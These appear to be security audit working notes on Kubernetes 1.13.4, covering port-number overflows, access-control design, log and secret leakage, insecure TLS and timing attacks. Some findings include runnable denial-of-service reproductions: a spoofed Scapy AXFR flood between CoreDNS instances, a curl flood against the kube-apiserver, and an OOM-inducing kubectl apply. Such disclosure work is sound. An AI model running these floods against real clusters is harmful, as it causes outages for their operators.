k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit.func1(0xc000b47730, 0x0, 0x0, 0x40a0000000000000, 0xc000e31838)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:339 +0x111
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit.func1(0xc000b47730, 0x0, 0x0, 0x38, 0xc0002febc0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:377 +0x81b
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Info).Visit(0xc000b47730, 0xc0002febc0, 0x0, 0x3500000000203000)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:92 +0x38
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.VisitorList.Visit(0xc000aee780, 0x1, 0x1, 0xc0002febc0, 0x571101, 0xc0002febc0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:177 +0x63
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit(0x74a78e0, 0xc000b38580, 0x74bb200, 0xc00068b5e0, 0xc00105a840, 0xc000b38600, 0x1, 0xc000b38600)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:372 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit(0x74a78a0, 0xc000aa56b0, 0xc0002feb80, 0x7f987bbe4001, 0xc0002feb80)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:334 +0xc3
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit(0x74a7820, 0xc000aee7a0, 0xc000b385c0, 0x3, 0x4, 0xc000b34d20, 0x0, 0xc000e31b68)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:306 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Result).Visit(0xc000305680, 0xc000b34d20, 0x10, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/result.go:99 +0x62
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose(0xc0003f5500, 0xc000f36c80, 0xc0007ee060, 0x2, 0x6, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:235 +0x2e7
k8s.io/kubernetes/pkg/kubectl/cmd/expose.NewCmdExposeService.func1(0xc000f36c80, 0xc0007ee060, 0x2, 0x6)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:138 +0x9d
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).execute(0xc000f36c80, 0xc0007ee000, 0x6, 0x6, 0xc000f36c80, 0xc0007ee000)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:760 +0x2cc
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).ExecuteC(0xc000ce0c80, 0x4, 0xc000ce0c80, 0xc000a09f10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:846 +0x2fd
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).Execute(0xc000ce0c80, 0x7, 0xc000a64f00)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:794 +0x2b
main.main()
_output/dockerized/go/src/k8s.io/kubernetes/cmd/hyperkube/main.go:64 +0x18f
The Service "nginx-deployment" is invalid:
* spec.ports[0].port: Invalid value: 184298154: must be between 1 and 65535, inclusive
* spec.ports[0].targetPort: Invalid value: 184298155: must be between 1 and 65535, inclusive
The overflow occurs in translateServicePortToTargetPort
which is called when kubectl port-forward
is called on a service (note that it won't trigger if we do port-forward to a pod).
The code responsible for the overflow is here:
func translateServicePortToTargetPort(ports []string, svc corev1.Service, pod corev1.Pod) ([]string, error) {
var translated []string
for _, port := range ports {
localPort, remotePort := splitPort(port)
portnum, err := strconv.Atoi(remotePort)
// (...) // first conversion
containerPort, err := util.LookupContainerPortNumberByServicePort(svc, pod, int32(portnum))
// (...) // second conversion
if int32(portnum) != containerPort { // <-- overflow occurs here
The setup is the one from before finding: we have a deployment and a service exposed.
Here we can see how it can be triggered - overflowing the target port:
^Croot@k8s-1:/home/vagrant# kubectl port-forward service/nginx-deployment 6666:4294973962
Forwarding from 127.0.0.1:6666 -> 80
It is also possible to overflow the host/local port, but there is a second validation here that prevents us from doing so:
root@k8s-1:/home/vagrant# kubectl port-forward service/nginx-deployment 4294973963
error: Service nginx-deployment does not have a service port 6667
root@k8s-1:/home/vagrant# kubectl port-forward service/nginx-deployment 4294973962
error: Error parsing local port '4294973962': strconv.ParseUint: parsing "4294973962": value out of range
As written before: the local port is parsed twice and the second validation is correct.
The first validation occurs in translateServicePortToTargetPort
(referenced before) and the second time by getListener
(vendor/k8s.io/client-go/tools/portforward/portforward.go:268
). The getListener
is used to create a listener on a local machine that will forward the traffic to the given service.
The code for second validation can be seen here:
// getListener creates a listener on the interface targeted by the given hostname on the given port with
// the given protocol. protocol is in net.Listen style which basically admits values like tcp, tcp4, tcp6
func (pf *PortForwarder) getListener(protocol string, hostname string, port *ForwardedPort) (net.Listener, error) {
listener, err := net.Listen(protocol, net.JoinHostPort(hostname, strconv.Itoa(int(port.Local))))
if err != nil {
return nil, fmt.Errorf("Unable to create listener: Error %s", err)
}
listenerAddress := listener.Addr().String()
host, localPort, _ := net.SplitHostPort(listenerAddress)
localPortUInt, err := strconv.ParseUint(localPort, 10, 16)
if err != nil {
fmt.Fprintf(pf.out, "Failed to forward from %s:%d -> %d\n", hostname, localPortUInt, port.Remote)
return nil, fmt.Errorf("Error parsing local port: %s from %s (%s)", err, listenerAddress, host)
}
port.Local = uint16(localPortUInt)
if pf.out != nil {
fmt.Fprintf(pf.out, "Forwarding from %s -> %d\n", net.JoinHostPort(hostname, strconv.Itoa(int(localPortUInt))), port.Remote)
}
return listener, nil
}
While Kubernetes uses usernames for access control decisions and in request logging, it does not have a user object nor does it store usernames or other information about users in its object store.
This seems like a golden egg for Confused Deputy..
Also, look at this section in the RBAC docs on running parallel authorizers...; that sounds incredibly dangerous...
Attribute-Based Access Control (ABAC) is one of the two primary AC/authZ systems that ships with k8s, the other being RBAC. Some thoughts:
The file format is one JSON object per line. There should be no enclosing list or map, just one map per line.
basically they use a bufio.Scanner
to read in JSON objects per line*
is wildcard works across namespaces, pods, &c.; malicious internal attacker can simply grant themselves perms across namespaces when they should be limited to a specific one, and the onus is on the admin to make sure the policies are correct... i.e. you can't really trust them at alldefault
with the format system:serviceaccount:<namespace>:default
for the namespace.Role-Based Access Control (RBAC) is the other main AC/authZ system within k8s. Generally, the RBAC system seems to be a bit more robust than the ABAC system; for example, Roles
are split from ClusterRole
which apply across the system. An admin who wanted to audit the resources can easily check if something includes ClusterRole
and deny the application...
cluster-admin
, admin
, edit
, view
, atop the various system:
roleskubectl whoami
is extremely interesting. Again, users and roles "aren't a thing" for the cluster, or even other authorizers, so they want to avoid conflation... Note also the kubectl auth --as ...
kubectl login
which also has some interesting implications.k8s logs the bearer token at verbosity level 10; I don't really care about the logging level, it should never log full auth tokens or creds.
I think we can take advantage of the implicit int64()
cast occurring in the initial comparison, followed by the explicit int32()
cast occurring right before a status update. Need to research this a bit more.
func storeDaemonSetStatus(dsClient unversionedapps.DaemonSetInterface, ds *apps.DaemonSet, desiredNumberScheduled, currentNumberScheduled, numberMisscheduled, numberReady, updatedNumberScheduled, numberAvailable, numberUnavailable int, updateObservedGen bool) error {
if int(ds.Status.DesiredNumberScheduled) == desiredNumberScheduled &&
int(ds.Status.CurrentNumberScheduled) == currentNumberScheduled &&
int(ds.Status.NumberMisscheduled) == numberMisscheduled &&
int(ds.Status.NumberReady) == numberReady &&
int(ds.Status.UpdatedNumberScheduled) == updatedNumberScheduled &&
int(ds.Status.NumberAvailable) == numberAvailable &&
int(ds.Status.NumberUnavailable) == numberUnavailable &&
ds.Status.ObservedGeneration >= ds.Generation {
return nil
}
toUpdate := ds.DeepCopy()
var updateErr, getErr error
for i := 0; i < StatusUpdateRetries; i++ {
if updateObservedGen {
toUpdate.Status.ObservedGeneration = ds.Generation
}
toUpdate.Status.DesiredNumberScheduled = int32(desiredNumberScheduled)
toUpdate.Status.CurrentNumberScheduled = int32(currentNumberScheduled)
toUpdate.Status.NumberMisscheduled = int32(numberMisscheduled)
toUpdate.Status.NumberReady = int32(numberReady)
toUpdate.Status.UpdatedNumberScheduled = int32(updatedNumberScheduled)
toUpdate.Status.NumberAvailable = int32(numberAvailable)
toUpdate.Status.NumberUnavailable = int32(numberUnavailable)
...
func findEnv(env []v1.EnvVar, name string) (v1.EnvVar, bool) {
for _, e := range env {
if e.Name == name {
return e, true
}
}
return v1.EnvVar{}, false
}
func updateEnv(existing []v1.EnvVar, env []v1.EnvVar, remove []string) []v1.EnvVar {
out := []v1.EnvVar{}
covered := sets.NewString(remove...)
for _, e := range existing {
if covered.Has(e.Name) {
continue
}
newer, ok := findEnv(env, e.Name)
if ok {
covered.Insert(e.Name)
out = append(out, newer)
continue
}
out = append(out, e)
}
for _, e := range env {
if covered.Has(e.Name) {
continue
}
covered.Insert(e.Name)
out = append(out, e)
}
return out
}
A host within a kubernetes cluster can cause the CoreDNS services to utilize excessive system resources (CPU). For example, in the following image it was possible to cause both instances of CoreDNS running on the kubernetes cluster to utilize over 100% CPU:
This example was possible by sending a DNS zone transfer to one instance (โ10.40.0.1โ) with a spoofed source IP of the second instance (โ10.40.0.2โ), causing the first instance to send unsolicited traffic to the second, as seen in the following packet capture:
IP 10.40.0.2.53 > 10.40.0.1.53: 0 AXFR? cluster.local. (31)
IP 10.40.0.1.53 > 10.40.0.2.53: 0*-| 6/0/0 SOA, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kube-dns.kube-system.svc.cluster.local.:53 0 100, SRV kubernetes-dashboard.kube-system.svc.cluster.local.:443 0 100 (457)
IP 10.40.0.1.53 > 10.40.0.2.53: 0* 0/1/0 (124)
IP 10.40.0.2.53 > 10.40.0.1.53: 0 FormErr- [0q] 0/0/0 (12)
The attack can be amplified by executing against both exposed DNS services, allowing an attacker to cause both instances of CoreDNS to โattackโ each other.
Run the following Scapy (https://github.com/secdev/scapy/) commands in two separate instances:
send(IP(dst="10.40.0.2", src="10.40.0.1")/UDP(dport=53,sport=53)/str(DNS(rd=0, qd=DNSQR(qtype="AXFR",qname='cluster.local.'))),count=-1)
send(IP(dst="10.40.0.1", src="10.40.0.2")/UDP(dport=53,sport=53)/str(DNS(rd=0, qd=DNSQR(qtype="AXFR",qname='cluster.local.'))),count=-1)
A malicious pod within the kubernetes cluster sends spoofed DNS requests to the CoreDNS services, consuming system resources, potentially leading to a denial of service condition against the DNS services.
Access to the CoreDNS service should be restricted to a load balanced front end, prohibiting direct access to the underlying nodes. This will prevent a malicious host from being able to target a single instance within the cluster as well as remove the ability of an attacker to amplify an attack by spoofing the source IP.
Internal Attacker is a position such that an unprivileged attacker has successfully transited external boundaries, and has established themselves on an internal resource, such as a container.
func (l *SSHTunnelList) Dial(ctx context.Context, net, addr string) (net.Conn, error) {
start := time.Now()
id := mathrand.Int63() // So you can match begins/ends in the log.
klog.Infof("[%x: %v] Dialing...", id, addr)
defer func() {
klog.Infof("[%x: %v] Dialed in %v.", id, addr, time.Since(start))
}()
tunnel, err := l.pickTunnel(strings.Split(addr, ":")[0])
if err != nil {
return nil, err
}
return tunnel.Dial(ctx, net, addr)
}
func (l *SSHTunnelList) pickTunnel(addr string) (tunnel, error) {
l.tunnelsLock.Lock()
defer l.tunnelsLock.Unlock()
if len(l.entries) == 0 {
return nil, fmt.Errorf("No SSH tunnels currently open. Were the targets able to accept an ssh-key for user %q?", l.user)
}
// Prefer same tunnel as kubelet
// TODO: Change l.entries to a map of address->tunnel
for _, entry := range l.entries {
if entry.Address == addr {
return entry.Tunnel, nil
}
}
klog.Warningf("SSH tunnel not found for address %q, picking random node", addr)
n := mathrand.Intn(len(l.entries))
return l.entries[n].Tunnel, nil
}
they pick a random SSH tunnel to use, which may or may not be the one the kubelet is using
The Kubernetes system allows users to set up a PKI, but in many cases fails to use authenticated TLS between components, which negates any benefit to using a PKI.
For example, the following connections do not use authenticated HTTPS:
This failure to authenticate components within the system is extremely dangerous and should be changed to use authenticated HTTPS by default. The lack of authentication for etcd alone has led to major vulnerabilities in a wide variety of applications.
The kube-apiserver
runs within the control plane of a Kubernetes cluster, and acts as the central authority on cluster state. Part of it's functionality is serving files in /var/log
from the /logs[/{logpath:*}]
routes of the kube-apiserver
. It can be accessed at <host with api server>:6443/logs
with an authenticated client (achievable through kubectl proxy
), and is on by default. This endpoints are defined within kubernetes/pkg/routes/logs.go
as follows.
// Logs adds handlers for the /logs path serving log files from /var/log.
type Logs struct{}
func (l Logs) Install(c *restful.Container) {
// use restful: ws.Route(ws.GET("/logs/{logpath:*}").To(fileHandler))
// See github.com/emicklei/go-restful/blob/master/examples/restful-serve-static.go
ws := new(restful.WebService)
ws.Path("/logs")
ws.Doc("get log files")
ws.Route(ws.GET("/{logpath:*}").To(logFileHandler).Param(ws.PathParameter("logpath", "path to the log").DataType("string")))
ws.Route(ws.GET("/").To(logFileListHandler))
c.Add(ws)
}
func logFileHandler(req *restful.Request, resp *restful.Response) {
logdir := "/var/log"
actual := path.Join(logdir, req.PathParameter("logpath"))
http.ServeFile(resp.ResponseWriter, req.Request, actual)
}
func logFileListHandler(req *restful.Request, resp *restful.Response) {
logdir := "/var/log"
http.ServeFile(resp.ResponseWriter, req.Request, logdir)
}
This endpoints are then registered within the master
(k8s.io/kubernetes/pkg/master/master.go
).
if c.ExtraConfig.EnableLogsSupport {
routes.Logs{}.Install(s.Handler.GoRestfulContainer)
}
The default configuration of kube-apiserver
has this endpoint enabled by default.
$ hyperkube kube-apiserver --help | grep logs
--enable-logs-handler If true, install a /logs handler for the apiserver logs. (default true)
This functionality allows an attacker with privileged access to the Kubernetes cluster to view logs of the host running the kube-apiserver
which may contain privileged information.
To authenticate requests, we can leverage kubectl proxy
:
$ kubectl proxy
Starting to serve on 127.0.0.1:8001
We can then perform a request to the kube-apiserver
defined within the kubeconfig
that the kubectl proxy
is leveraging for authentication:
$ curl "127.0.0.1:8001/logs/"
<pre>
<a href="lol/">lol/</a>
<a href="test">test</a>
</pre>
Traversal can then be performed based on the logpath
route parameter:
$ curl "127.0.0.1:8001/logs/lol/"
<pre>
<a href="haha/">haha/</a>
</pre>
File contents can also be viewed:
$ curl "127.0.0.1:8001/logs/test"
lol
Initially it was believed that parent directory traversal may be possible. However, the use of http.ServeFile
and the use of a path parameter instead of query parameter for logpath
prevent parent directory traversals.
The ServeFile
function of the standard library is defined as follows.
func ServeFile(w ResponseWriter, r *Request, name string) {
if containsDotDot(r.URL.Path) {
// Too many programs use r.URL.Path to construct the argument to
// serveFile. Reject the request under the assumption that happened
// here and ".." may not be wanted.
// Note that name might not contain "..", for example if code (still
// incorrectly) used filepath.Join(myDir, r.URL.Path).
Error(w, "invalid URL path", StatusBadRequest)
return
}
dir, file := filepath.Split(name)
serveFile(w, r, Dir(dir), file, false)
}
Within this function, the request path is checked to see if there are any ..
characters in the path through the use of the containsDotDot
function below.
func containsDotDot(v string) bool {
if !strings.Contains(v, "..") {
return false
}
for _, ent := range strings.FieldsFunc(v, isSlashRune) {
if ent == ".." {
return true
}
}
return false
}
This function will break the path up based on slash runes (defined in isSlashRune
below), searching for any parts of the path which contain ..
.
func isSlashRune(r rune) bool { return r == '/' || r == '\\' }
Bringing this all together, due to the logpath
being a path parameter, the http.ServeFile
function will check the entire path for ..
using containsDotDot
. If it contains a ..
, it will not return the file specified by logpath
, resulting in a mitigation for parent directory traversal.
There's probably a ton of these that we can find, but:
// InClusterConfig returns a config object which uses the service account
// kubernetes gives to pods. It's intended for clients that expect to be
// running inside a pod running on kubernetes. It will return ErrNotInCluster
// if called from a process not running in a kubernetes environment.
func InClusterConfig() (*Config, error) {
const (
tokenFile = "/var/run/secrets/kubernetes.io/serviceaccount/token"
rootCAFile = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
)
The default service token doesn't have an expiration date (can be obtained e.g. with kubectl get secret -o json
).
OTOH it seems that if you create token by yourself, you can set one: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#service-account-token-volume-projection
The kubectl apply
function is vulnerable to an OOM due to fully reading a podspec. Despite there being a limit on the size of a podspec, kubectl
attempts to read the entire podspec before validating it. Thus, you can provide an arbitrary sized file until OOM is reached. Triggering this remotely from a web resource is more resource efficient, since you can stream the response infinitely to trigger the OOM, removing the constraint of having a large podspec on disk.
This works with both local and remote (http(s)) podspecs.
Repro information is below, run on one of the master nodes (which is what the second snippet is referencing). If run on a master, this will result in a crash of the containers on that machine.
root@node1:/home/ubuntu# kubectl apply -f env_pod_524288000_0.yaml
Killed
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Warning SystemOOM 82s (x31 over 3m53s) kubelet, node1 System OOM encountered
In its current state, Kubernetes does not support certificate revocation. Therefore, users must regenerate the entire cert chain to remove a certificate from the system. This has been documented in open issue and addressed elsewhere here.
Eve successfully gains access to a node in Bob's Kubernetes cluster. Bob wants to revoke that node's certificate so that is not viewed as valid by the rest of the system, while also not having to incur the cost of re-generating the certificate tree. This is not possible, and Eve is able to maliciously control the node until Bob updates the entire cluster.
There are two options for supporting certificate revocation. One involves all nodes maintain a certificate revocation list (CRL) that must be checked whenever they are presented with a certificate.
Another option is using OCSP stapling. Here, the CLR is held by an OCSP server, which the owner of the cluster can use to revoke certificates. Each certificate holder periodically queries the OCSP server to get timestamped evidence that its certificate is still valid.
We believe using OCSP stapling, where the apiserver
functions as the OCSP and the CLR is stored in etcd
, is the best solution to this problem. This way, users can simply update the CLR and all nodes will periodically ask the apiserver
for an updated timestamp proving their cert is still valid. Our approach incurs minimal overhead and uses tools readily available in the Go ecosystem.
// CheckClusterHealth makes sure:
// - the API /healthz endpoint is healthy
// - all master Nodes are Ready
// - (if self-hosted) that there are DaemonSets with at least one Pod for all control plane components
// - (if static pod-hosted) that all required Static Pod manifests exist on disk
func CheckClusterHealth(client clientset.Interface, ignoreChecksErrors sets.String) error {
fmt.Println("[upgrade] Making sure the cluster is healthy:")
healthChecks := []preflight.Checker{
&healthCheck{
name: "APIServerHealth",
client: client,
f: apiServerHealthy,
},
&healthCheck{
name: "MasterNodesReady",
client: client,
f: masterNodesReady,
},
// TODO: Add a check for ComponentStatuses here?
}
healthChecks = append(healthChecks, &healthCheck{
name: "StaticPodManifest",
client: client,
f: staticPodManifestHealth,
})
return preflight.RunChecks(healthChecks, os.Stderr, ignoreChecksErrors)
}
Kubernetes can be configured to use iSCSI volumes. When using CHAP authentication the CHAP secrets are stored using the Secret API. Example:
https://github.com/kubernetes/examples/blob/master/staging/volumes/iscsi/chap-secret.yaml
When a pod is configured to use iSCSI and the AttachDisk
method is called, this will call the following code from kubernetes\pkg\volume\iscsi\iscsi_util.go:
var (
chapSt = []string{
"discovery.sendtargets.auth.username",
"discovery.sendtargets.auth.password",
"discovery.sendtargets.auth.username_in",
"discovery.sendtargets.auth.password_in"}
chapSess = []string{
"node.session.auth.username",
"node.session.auth.password",
"node.session.auth.username_in",
"node.session.auth.password_in"}
ifaceTransportNameRe = regexp.MustCompile(`iface.transport_name = (.*)\n`)
ifaceRe = regexp.MustCompile(`.+/iface-([^/]+)/.+`)
)
func updateISCSIDiscoverydb(b iscsiDiskMounter, tp string) error {
if !b.chapDiscovery {
return nil
}
out, err := b.exec.Run("iscsiadm", "-m", "discoverydb", "-t", "sendtargets", "-p", tp, "-I", b.Iface, "-o", "update", "-n", "discovery.sendtargets.auth.authmethod", "-v", "CHAP")
if err != nil {
return fmt.Errorf("iscsi: failed to update discoverydb with CHAP, output: %v", string(out))
}
for _, k := range chapSt {
v := b.secret[k]
if len(v) > 0 {
out, err := b.exec.Run("iscsiadm", "-m", "discoverydb", "-t", "sendtargets", "-p", tp, "-I", b.Iface, "-o", "update", "-n", k, "-v", v)
if err != nil {
return fmt.Errorf("iscsi: failed to update discoverydb key %q with value %q error: %v", k, v, string(out))
}
}
}
return nil
}
func updateISCSINode(b iscsiDiskMounter, tp string) error {
if !b.chapSession {
return nil
}
out, err := b.exec.Run("iscsiadm", "-m", "node", "-p", tp, "-T", b.Iqn, "-I", b.Iface, "-o", "update", "-n", "node.session.auth.authmethod", "-v", "CHAP")
if err != nil {
return fmt.Errorf("iscsi: failed to update node with CHAP, output: %v", string(out))
}
for _, k := range chapSess {
v := b.secret[k]
if len(v) > 0 {
out, err := b.exec.Run("iscsiadm", "-m", "node", "-p", tp, "-T", b.Iqn, "-I", b.Iface, "-o", "update", "-n", k, "-v", v)
if err != nil {
return fmt.Errorf("iscsi: failed to update node session key %q with value %q error: %v", k, v, string(out))
}
}
}
return nil
}
These two functions both iterate over a slice of strings that are keys that reference secrets in a map. These are then used to generate iscsiadm
commands. As shown, if there are errors in executing these commands, errors are returned with both the key and secret values in the error string. These errors will eventually be logged using klog
:
if lastErr != nil {
klog.Errorf("iscsi: last error occurred during iscsi init:\n%v", lastErr)
}
Someone with access to these logs would be able to view the sensitive secrets and potentially gain access to iSCSI volumes.
Many services seed the non-cryptographic PRNG (math.rand) using system time allowing an attacker to predict certain random values.
Many services including kubelet
, api-server
, kube-scheduler
, kube-proxy
seed the random number generator in the following manner.
rand.Seed(time.Now().UnixNano())
This is generally fine since the code properly uses crypto/rand
for cryptographic operations like key generations. No cryptographic primitives were observed incorrectly using math/rand
.
However, it can make certain identifiers predictable and simplify aspects of an exploitation chain. In the following example, the node is assigned a random name that could be guessable to an attacker who knows uptime information.
func (kubemarkController *KubemarkController) addNodeToNodeGroup(nodeGroup string) error {
node := kubemarkController.nodeTemplate.DeepCopy()
...
node.Name = fmt.Sprintf("%s-%d", nodeGroup, kubemarkController.rand.Int63())
...
client.CoreV1().ReplicationControllers(node.Namespace).Create(node)
}
If an attacker needs to know the name or identifier of a service/pod/node that is infeasible to brute force, the attacker may be able to deduce the uptime from the current environment and smartly enumerate possible seeds and narrow the space of possible names/identifiers.
Seed the random number generator using a less predictable seed similar to the following.
import (
"encoding/binary"
"math/rand"
srand "crypto/rand"
)
func InitSeed() (err error){
b := make([]byte, 8)
_, err = srand.Read(b)
if err == nil {
rand.Seed(int64(binary.LittleEndian.Uint64(b[:])))
}
return err
}
The original vulnerability was reported https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/.
The fix was introduced in 1.13.5 although this fix is incomplete and still allows arbitrary file overwrites.
Vulnerable (1.13.4): https://github.com/kubernetes/kubernetes/blob/v1.13.4/pkg/kubectl/cmd/cp/cp.go#L448
"Fixed" (1.13.5): https://github.com/kubernetes/kubernetes/blob/v1.13.5/pkg/kubectl/cmd/cp/cp.go#L460
There appears to be a hierarchy of Deployment -> ReplicaSet
, but the ReplicaSet
and ReplicaController
are on the same management level, but with different Pod
label targeting methods. My concern is a Deployment
attempting to manage N ReplicaSet
s which is managing a particular Pod
label, and a ReplicaController
which is attempting to manage another particular label, and you have a Pod
with both labels. Subsequently a Deployment
attempts to create a new ReplicaSet
, spinning up a new version of a Pod
into it, then removing the old Pod
. However, when the Deployment
attempts to remove the old Pod
, the ReplicaController
notices the label it's targeting is below desired, and spins it back up. This results in the Deployment
attempting to fight against the ReplicaController
, potentially failing the Deployment
because it can't remove all instances of the previous version (since this is relevant to maxSurge
and maxUnavailable
attributes of a Deployment
's rollingUpdate
settings).
This needs testing & further investigation this week. Should be pretty easy to test, the theoretical idea being:
Deployment
, managing all pods in a namespace with the label "app1=foo"
ReplicaController
, managing all pods in a namespace with the label "app2=bar"
Deployment
managed pods with the label "app2=bar"
.Deployment
to redeploy the "app1=foo"
pods.ReplicaController
attempts to keep the "app1=foo","app2=bar"
pod alive, preventing the Deployment
from completing the rolling upgrade to the new ReplicaSet
, specifically during downscaling of the old ReplicaSet
.The attack vector here is an attacker who has internal cluster access, and is able to interface with the kube-apiserver
. This could be a method to prevent cluster operators from patching the entry point in the application which allowed the attacker in, since a deployment would not be able to finish successfully.
Teraform has HTTP Basic Auth as a default type, we need to look into this more and see what in k8s enables that (and why does it exist)
https://www.terraform.io/docs/providers/kubernetes/index.html#authentication
Add this to next week's findings...
When using a password (basic auth) or a static token file (token auth) the API server does not perform a secure comparison of secret values. In theory, this could allow an attacker to perform a timing attack on the comparison.
When using a password for authentication a standard string comparison occurs. When using a token file, a map is checked by key, which ultimately becomes a string comparison. Ideally, a constant time comparison would be used https://golang.org/pkg/crypto/subtle/#ConstantTimeCompare.
github.com\kubernetes\kubernetes\staging\src\k8s.io\apiserver\plugin\pkg\authenticator\password\passwordfile\passwordfile.go
func (a *PasswordAuthenticator) AuthenticatePassword(ctx context.Context, username, password string) (*authenticator.Response, bool, error) {
user, ok := a.users[username]
if !ok {
return nil, false, nil
}
if user.password != password {
return nil, false, nil
}
return &authenticator.Response{User: user.info}, true, nil
}
github.com\kubernetes\kubernetes\staging\src\k8s.io\apiserver\pkg\authentication\token\tokenfile\tokenfile.go
func (a *TokenAuthenticator) AuthenticateToken(ctx context.Context, value string) (*authenticator.Response, bool, error) {
user, ok := a.tokens[value]
if !ok {
return nil, false, nil
}
return &authenticator.Response{User: user}, true, nil
}
Seriously, checking for the various User Agent Building code...
By making excessive unauthenticated requests to exposed kube-apiserver HTTP interfaces it is possible to consume excessive system resources (CPU). For example, monitoring the kubernetes host system usage, the kube-apiserver was seen utilizing 110-120% system CPU:
Deploy a pod within the kubernetes cluster, utilize xargs
and curl
to make many simultaneous requests to the kube-apiserver
:
root@ubuntu-test-1:/# for i in $(seq 25); do head /dev/urandom | tr -dc A-Za-z0-9 | head -c 1000 >> list; echo "" >> list; done
root@ubuntu-test-1:/# while true; do xargs -a list -I{} -P20 curl -k https://172.17.0.4:6443/api/{}; done
A malicious user executing on a kubernetes pod executes excessive unauthenticated requests against the kube-apiserver
endpoint as outlined in the reproduction steps.
The kubernetes cluster can utilize IPTABLES
rules to rate limit connections to this service by using the โseconds
and โupdate
. It may be difficult to find a system wide setting which would be acceptable for these rules, however runtime tuning of these rules could be carried out by reacting to application feedback. For example, triggering a rate limit when a pod within the cluster has reached a configured threshold of requests which result in a 403 or 404.
There are many places that use InsecureSkipVerify: true
- https://golang.org/pkg/crypto/tls/:
// InsecureSkipVerify controls whether a client verifies the
// server's certificate chain and host name.
// If InsecureSkipVerify is true, TLS accepts any certificate
// presented by the server and any host name in that certificate.
// In this mode, TLS is susceptible to man-in-the-middle attacks.
// This should be used only for testing.
InsecureSkipVerify bool
Some of those insecure connections might not go out of current node so maybe those are fine? guess we need to check it on a multi-node cluster, maybe with a wireshark? maybe with setting a proxy and changing the certs?
src/kubernetes-1.13.4/cmd/kube-apiserver/app/server.go:260
]:(https://github.com/trailofbits/audit-kubernetes/blob/master/src/kubernetes-1.13.4/cmd/kube-apiserver/app/server.go#L260-L266):// Proxying to pods and services is IP-based... don't expect to be able to verify the hostname
proxyTLSClientConfig := &tls.Config{InsecureSkipVerify: true}
proxyTransport := utilnet.SetTransportDefaults(&http.Transport{
DialContext: proxyDialerFn,
TLSClientConfig: proxyTLSClientConfig,
})
return nodeTunneler, proxyTransport, nil
This is called in:
// CreateServerChain creates the apiservers connected via delegation.
func CreateServerChain(completedOptions completedServerRunOptions, stopCh <-chan struct{}) (*genericapiserver.GenericAPIServer, error) {
So it seems that if we have a kubernetes cluster that has multiple kube-apiservers (needed e.g. for high availability) they connect to each other not really checking out certificates?
// New creates Prober that will skip TLS verification while probing.
func New() Prober {
tlsConfig := &tls.Config{InsecureSkipVerify: true}
return NewWithTLSConfig(tlsConfig)
}
